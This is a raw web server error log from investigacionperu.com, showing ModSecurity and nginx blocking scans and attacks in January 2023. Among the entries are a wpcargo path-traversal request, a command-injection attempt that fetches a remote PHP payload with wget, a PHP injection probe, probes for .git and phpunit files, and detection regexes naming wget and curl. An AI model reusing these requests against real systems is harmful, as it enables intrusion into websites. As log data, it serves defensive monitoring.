"OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y7Uz53nISM4EDKINSIlbMwAAAUI"] 2023/01/04 10:09:00 [error] 10949#10949: *87301 access forbidden by rule, client: 70.34.213.215, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Wed Jan 04 11:39:44.152317 2023] [:error] [pid 10993:tid 139989560063744] [client 85.31.44.203:34020] [client 85.31.44.203] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "29"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "Y7Wr0I6w8yoJMbMRurq_BwAAAIE"], referer: anonymousfox.co [Wed Jan 04 12:47:06.647818 2023] [:error] [pid 10993:tid 139989526492928] [client 5.188.62.140:36264] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y7W7mo6w8yoJMbMRurq_0wAAAIU"] [Wed Jan 04 14:05:05.959012 2023] [:error] [pid 11199:tid 139989417387776] [client 5.188.62.174:38664] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y7XN4U02F_eugkSTZQIxbQAAANI"] [Wed Jan 04 16:42:53.384513 2023] [:error] [pid 11199:tid 139989518100224] [client 5.188.62.21:44312] [client 5.188.62.21] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y7Xy3U02F_eugkSTZQI1IAAAAMY"] [Wed Jan 04 18:41:44.628901 2023] [autoindex:error] [pid 11199:tid 139989417387776] [client 91.134.248.211:49060] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/uploads/index.php [Wed Jan 04 22:12:59.067009 2023] [autoindex:error] [pid 10993:tid 139989467744000] [client 162.214.159.190:56214] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Cookie/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/Requests/Cookie/index.php 2023/01/04 23:42:20 [error] 10948#10948: *110625 access forbidden by rule, client: 70.34.211.179, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu Jan 05 12:29:59.016258 2023] [:error] [pid 7447:tid 140249095186176] [client 5.188.62.26:58486] [client 5.188.62.26] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y7cJFzjfU5_vmhN3opunhAAAAMc"] [Thu Jan 05 14:36:17.394388 2023] [:error] [pid 6862:tid 140248977688320] [client 5.188.62.140:34734] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y7cmsQHngWf1huPzqS4ZaQAAAJU"] [Thu Jan 05 19:32:50.824229 2023] [:error] [pid 6862:tid 140249103578880] [client 5.188.62.140:48694] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y7dsMgHngWf1huPzqS4e9QAAAIY"] [Thu Jan 05 19:53:43.620298 2023] [:error] [pid 6861:tid 140249103578880] [client 65.109.132.156:49818] [client 65.109.132.156] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath=../../../x.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wpcargo/includes/barcode.php"] [unique_id "Y7dxFzWZ7d2-chhUN071oQAAAEY"], referer: www.google.com [Thu Jan 05 19:53:43.869686 2023] [:error] [pid 6860:tid 140248952510208] [client 65.109.132.156:49820] [client 65.109.132.156] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:2. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:2: wget https:/pst.klgrth.io/paste/e7yx8/raw -O king.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/x.php"] [unique_id "Y7dxF5X4fiXowdgc4xyG0AAAABg"], referer: www.google.com [Fri Jan 06 00:04:20.629243 2023] [autoindex:error] [pid 7447:tid 140249137149696] [client 43.154.97.170:59128] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/fonts/index.php [Fri Jan 06 00:04:22.771543 2023] [autoindex:error] [pid 6860:tid 140249011259136] [client 43.154.97.170:59134] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/fonts/index.php 2023/01/06 00:42:52 [error] 6818#6818: *156394 access forbidden by rule, client: 179.43.177.154, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/01/06 00:42:54 [error] 6819#6819: *156401 access forbidden by rule, client: 3.135.248.6, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/01/06 00:42:56 [error] 6818#6818: *156402 access forbidden by rule, client: 179.43.177.154, server: mail.investigacionperu.com, request: "GET /.svn/entries HTTP/1.1", host: "mail.investigacionperu.com" 2023/01/06 00:43:15 [error] 6818#6818: *156491 access forbidden by rule, client: 185.3.94.68, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/01/06 00:43:15 [error] 6818#6818: *156527 access forbidden by rule, client: 164.92.224.29, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2023/01/06 00:43:16 [error] 6819#6819: *156610 access forbidden by rule, client: 139.59.135.127, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2023/01/06 00:43:17 [error] 6818#6818: *156655 access forbidden by rule, client: 185.3.94.68, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/01/06 00:43:18 [error] 6818#6818: *156716 access forbidden by rule, client: 164.92.135.200, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2023/01/06 00:43:18 [error] 6818#6818: *156774 access forbidden by rule, client: 139.144.69.48, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2023/01/06 00:43:44 [error] 6818#6818: *156827 access forbidden by rule, client: 179.43.177.154, server: mail.investigacionperu.com, request: "GET /.hg/requires HTTP/1.1", host: "mail.investigacionperu.com" 2023/01/06 00:43:57 [error] 6818#6818: *156834 access forbidden by rule, client: 3.135.248.6, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/01/06 00:45:01 [error] 6818#6818: *156963 access forbidden by rule, client: 179.43.177.154, server: mail.investigacionperu.com, request: "GET /wp-content/plugins/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/01/06 00:45:01 [error] 6818#6818: *156964 access forbidden by rule, client: 179.43.177.154, server: mail.investigacionperu.com, request: "GET /wp-content/themes/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/01/06 00:45:01 [error] 6819#6819: *156965 access forbidden by rule, client: 179.43.177.154, server: mail.investigacionperu.com, request: "GET /wp-includes/js/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/01/06 00:45:01 [error] 6819#6819: *156966 access forbidden by rule, client: 179.43.177.154, server: mail.investigacionperu.com, request: "GET /wp-content/.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Fri Jan 06 03:50:27.036609 2023] [ssl:warn] [pid 30630:tid 139806463121280] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 06 03:50:27.171477 2023] [ssl:warn] [pid 30631:tid 139806463121280] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 06 03:50:27.499851 2023] [ssl:warn] [pid 30631:tid 139806463121280] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 06 03:50:29.164672 2023] [ssl:warn] [pid 30631:tid 139806463121280] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 06 03:50:31.491926 2023] [ssl:warn] [pid 31076:tid 140643631867776] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 06 03:50:31.602653 2023] [ssl:warn] [pid 31077:tid 140643631867776] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 06 03:50:32.246806 2023] [ssl:warn] [pid 31077:tid 140643631867776] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 06 14:51:11.254901 2023] [ssl:warn] [pid 4270:tid 139914994747264] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 06 14:51:11.378458 2023] [ssl:warn] [pid 4271:tid 139914994747264] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 06 20:00:07.026336 2023] [:error] [pid 4360:tid 139914641360640] [client 5.188.62.26:57128] [client 5.188.62.26] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y7jEF5U_hDvKCkl6xM6vcAAAAMw"] [Sat Jan 07 03:36:32.906921 2023] [ssl:warn] [pid 16228:tid 139791088895872] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 07 03:36:33.029162 2023] [ssl:warn] [pid 16229:tid 139791088895872] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 07 03:36:33.499381 2023] [ssl:warn] [pid 16229:tid 139791088895872] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 07 03:36:35.592566 2023] [ssl:warn] [pid 16229:tid 139791088895872] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 07 03:36:39.185191 2023] [ssl:warn] [pid 16767:tid 139647431763840] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 07 03:36:39.296047 2023] [ssl:warn] [pid 16768:tid 139647431763840] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 07 14:01:16.675882 2023] [:error] [pid 16785:tid 139647120283392] [client 5.188.62.140:37138] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y7nBfN2JhwLTTdjOhd0dZQAAAAc"] [Sun Jan 08 03:45:33.425413 2023] [ssl:warn] [pid 10028:tid 140587963471744] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 08 03:45:33.550979 2023] [ssl:warn] [pid 10029:tid 140587963471744] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 08 03:45:33.849450 2023] [ssl:warn] [pid 10029:tid 140587963471744] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 08 03:45:35.550451 2023] [ssl:warn] [pid 10029:tid 140587963471744] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 08 03:45:37.842700 2023] [ssl:warn] [pid 10506:tid 139929789699968] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 08 03:45:37.951431 2023] [ssl:warn] [pid 10507:tid 139929789699968] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 08 12:03:17.173172 2023] [:error] [pid 10529:tid 139929363347200] [client 5.188.62.140:53998] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y7r3VVrn1qfpS85w-jvKlgAAAJU"] [Sun Jan 08 14:29:18.952424 2023] [autoindex:error] [pid 10528:tid 139929430488832] [client 141.94.87.67:58612] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/crop/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/crop/index.php [Sun Jan 08 19:09:19.045277 2023] [:error] [pid 10797:tid 139929354954496] [client 5.188.62.26:41820] [client 5.188.62.26] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y7tbL75jnoqhAU5iDJIUDQAAANY"] [Sun Jan 08 20:00:23.809997 2023] [:error] [pid 10528:tid 139929371739904] [client 5.188.62.76:44376] [client 5.188.62.76] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y7tnJzHds1okb2ptDplvcAAAAFQ"] [Mon Jan 09 03:47:21.487368 2023] [ssl:warn] [pid 30335:tid 140250305456000] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 09 03:47:21.602415 2023] [ssl:warn] [pid 30336:tid 140250305456000] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 09 03:47:22.063870 2023] [ssl:warn] [pid 30336:tid 140250305456000] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 09 03:47:23.509005 2023] [ssl:warn] [pid 30336:tid 140250305456000] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 09 03:47:27.155402 2023] [ssl:warn] [pid 30780:tid 139715895494528] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 09 03:47:27.276309 2023] [ssl:warn] [pid 30781:tid 139715895494528] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 10 00:07:08.204284 2023] [autoindex:error] [pid 31291:tid 139715453826816] [client 43.130.114.141:48110] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue Jan 10 00:38:31.144149 2023] [:error] [pid 30799:tid 139715579717376] [client 5.188.62.140:49118] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y7z51-Bdqnoop8ZiD8FLHgAAAEg"] [Tue Jan 10 02:01:21.884138 2023] [:error] [pid 30800:tid 139715621680896] [client 178.33.236.214:51806] [client 178.33.236.214] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:X-Dns-Prefetch-Control. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:X-Dns-Prefetch-Control: die(md5(76));"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/index.php"] [unique_id "Y70NQRpLJxorUcX_qiEQOwAAAIM"] [Tue Jan 10 03:40:25.902874 2023] [ssl:warn] [pid 5214:tid 139676139698048] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 10 03:40:26.034792 2023] [ssl:warn] [pid 5215:tid 139676139698048] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 10 03:40:26.378194 2023] [ssl:warn] [pid 5215:tid 139676139698048] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 10 03:40:28.508244 2023] [ssl:warn] [pid 5215:tid 139676139698048] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 10 03:40:30.850112 2023] [ssl:warn] [pid 5631:tid 140322364180352] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 10 03:40:30.983044 2023] [ssl:warn] [pid 5632:tid 140322364180352] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 10 08:40:44.503553 2023] [ssl:warn] [pid 5632:tid 140322364180352] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 10 11:05:09.983961 2023] [ssl:warn] [pid 5632:tid 140322364180352] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 10 11:07:15.661571 2023] [ssl:warn] [pid 2109:tid 140560327010176] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 10 11:07:15.775926 2023] [ssl:warn] [pid 2110:tid 140560327010176] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 11 00:09:02.996423 2023] [autoindex:error] [pid 2217:tid 140559909840640] [client 74.208.212.214:48052] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Jan 11 00:09:06.219585 2023] [autoindex:error] [pid 2217:tid 140560052516608] [client 74.208.212.214:48054] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Jan 11 00:09:09.974568 2023] [autoindex:error] [pid 2217:tid 140559901447936] [client 74.208.212.214:48058] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex 